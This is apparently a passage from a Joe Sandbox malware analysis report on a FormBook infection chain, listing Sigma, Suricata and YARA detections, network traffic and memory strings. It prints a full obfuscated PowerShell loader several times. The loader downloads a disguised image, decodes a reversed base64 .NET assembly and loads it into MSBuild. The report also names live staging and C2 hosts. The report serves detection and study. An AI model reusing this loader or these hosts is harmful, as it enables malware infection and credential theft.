8AZgAoACQAYgByAGkAbQApADsAJABjAG8AbgB0AGUAbgBoAG8AIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABjAG8AbABhAHAAcwBvACAALQBnAHQAIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYwBvAG4AdABlAG4AaABvACAAKwA9ACAAJAB4AGEAcQB1AGUAYwBhAC4ATABlAG4AZwB0AGgAOwAkAHEAdQBpAG4AYQBsACAAPQAgACQAYwBvAGwAYQBwAHMAbwAgAC0AIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYQBsAG0AZQBpAGQAaQBuAGEAIAA9ACAAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAG4AdABlAG4AaABvACwAIAAkAHEAdQBpAG4AYQBsACkAOwAkAGIAdQBiAGUAbABhACAAPQAgAC0AagBvAGkAbgAgACgAJABhAGwAbQBlAGkAZABpAG4AYQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAYQBsAG0AZQBpAGQAaQBuAGEALgBMAGUAbgBnAHQAaAApAF0AOwAkAGEAZABqAHUAdABvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AGIAZQBsAGEAKQA7ACQAcABhAGQAcgBhAHMAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGEAZABqAHUAdABvAHIAKQA7ACQAbQ
                  Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64String($bubela);$padrasto = [System.Reflection.Assembly]::Load($adjutor);$manducar = [dnlib.IO.Home].GetMethod('VAI');$manducar.Invoke($null, @('0/VAfz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'MSBuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64Strin

                  Data Obfuscation

                  barindex
                  Sigma detected: Powershell download and load assembly
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64String($bubela);$padrasto = [System.Reflection.Assembly]::Load($adjutor);$manducar = [dnlib.IO.Home].GetMethod('VAI');$manducar.Invoke($null, @('0/VAfz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'MSBuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64Strin

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T10:06:04.610000+010020507451Malware Command and Control Activity Detected192.168.2.449751192.186.57.3080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T10:05:09.005082+010020490381A Network Trojan was detected151.101.1.137443192.168.2.449731TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T10:05:26.705288+010028582951A Network Trojan was detected104.21.84.67443192.168.2.449738TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-03T10:05:25.647927+010028410751Malware Command and Control Activity Detected192.168.2.449738104.21.84.67443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.2951402841.0000000004770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2951435333.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2570201674.0000000006950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49802 version: TLS 1.2
                  Source: Binary string: choice.pdbGCTL source: MSBuild.exe, 00000009.00000002.2190330071.0000000000E38000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: wscript.exe, 00000000.00000002.2396088723.000000001F1AC000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 0000000A.00000002.2951040411.0000000002C55000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951908550.000000000500C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2492779441.000000001BA1C000.00000004.80000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 0000000A.00000003.2186865079.000000000482E000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 0000000A.00000003.2185050741.0000000004679000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, choice.exe, choice.exe, 0000000A.00000003.2186865079.000000000482E000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 0000000A.00000003.2185050741.0000000004679000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: choice.pdb source: MSBuild.exe, 00000009.00000002.2190330071.0000000000E38000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B1C9D0 FindFirstFileW,FindNextFileW,FindClose,10_2_02B1C9D0

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\wscript.exeCode function: 4x nop then mov ebx, 00000004h0_2_02D4BFB2
                  Source: C:\Windows\System32\wscript.exeCode function: 4x nop then mov ebx, 00000004h0_2_0000023761C1E4E8
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 4x nop then xor eax, eax10_2_02B09D10
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 4x nop then mov ebx, 00000004h10_2_048C04E8
                  Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then mov ebx, 00000004h11_2_000001BADB8244E8

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49751 -> 192.186.57.30:80
                  Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.4:49738
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.4:49731
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 192.186.57.30 80Jump to behavior
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
                  Connects to a pastebin service (likely for C&C)
                  Source: unknownDNS query: name: paste.ee
                  Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /r/5zfAV/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 151.101.1.137 151.101.1.137
                  Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                  Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                  Source: Joe Sandbox ViewASN Name: FEDERAL-ONLINE-GROUP-LLCUS FEDERAL-ONLINE-GROUP-LLCUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49738 -> 104.21.84.67:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                  Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                  Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                  Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /d/69SP6 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /r/5zfAV/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /skhs/?q2gYNc=YYGtc0vZDxBZaqOUfK8EjJlrwUEGCmw9C1cdleHi+lzAM/tSLZDkT6oQFAP0CoyED8RVRESu2LRjuGrjAaGK14wgZjrklmy8P/7KZtR3AGJqubIGbQJuqGM=&i7g0=S7yiJ01bbdLMH HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.yxni.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36
                  Source: global trafficDNS traffic detected: DNS query: paste.ee
                  Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                  Source: global trafficDNS traffic detected: DNS query: www.yxni.vip
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 09:06:01 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9aContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                  Source: powershell.exe, 00000005.00000002.1963200942.0000028286DEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://paste.ee
                  Source: powershell.exe, 00000003.00000002.2278601121.00000176B8645000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 00000003.00000002.2278601121.00000176B8678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                  Source: powershell.exe, 00000003.00000002.2278601121.00000176B8690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: wscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                  Source: wscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                  Source: choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: wscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                  Source: wscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                  Source: choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: wscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                  Source: wscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                  Source: wscript.exe, 00000000.00000003.2389360512.000002375F174000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390620725.000002375F17C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398310964.000002375F17E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: choice.exe, 0000000A.00000002.2951040411.0000000002CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: choice.exe, 0000000A.00000002.2951040411.0000000002CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                  Source: choice.exe, 0000000A.00000002.2951040411.0000000002CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: choice.exe, 0000000A.00000002.2951040411.0000000002CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10339w
                  Source: choice.exe, 0000000A.00000002.2951040411.0000000002CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                  Source: choice.exe, 0000000A.00000003.2377805989.0000000007B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                  Source: wscript.exe, 00000000.00000003.2390482161.000002375F11F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398084060.000002375F11F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390126097.000002375F11F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.0000028286DEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee
                  Source: wscript.exe, 00000000.00000003.2389360512.000002375F174000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390620725.000002375F17C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398310964.000002375F17E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
                  Source: wscript.exe, 00000000.00000002.2397950475.000002375F090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/69
                  Source: wscript.exe, 00000000.00000003.2389360512.000002375F128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398163728.000002375F129000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389226631.000002375F123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/69S
                  Source: wscript.exe, 00000000.00000003.2390482161.000002375F11F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398084060.000002375F11F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390126097.000002375F11F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/69SP
                  Source: wscript.exe, wscript.exe, 00000000.00000003.2390482161.000002375F11F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398084060.000002375F0C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389360512.000002375F128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390249837.000002375F0C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398231478.000002375F13D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389360512.000002375F174000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398448310.000002375F245000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390620725.000002375F17C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389626016.000002375F12E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398084060.000002375F11F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389735443.000002375F13C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389226631.000002375F123000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2397654619.0000004DFD2F5000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390126097.000002375F11F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398521954.0000023760E80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398310964.000002375F17E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389647370.000002375F133000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/69SP6
                  Source: powershell.exe, 00000005.00000002.1963200942.0000028286DEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/r/5zfAV/0
                  Source: powershell.exe, 00000005.00000002.1963200942.0000028287319000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
                  Source: wscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                  Source: wscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
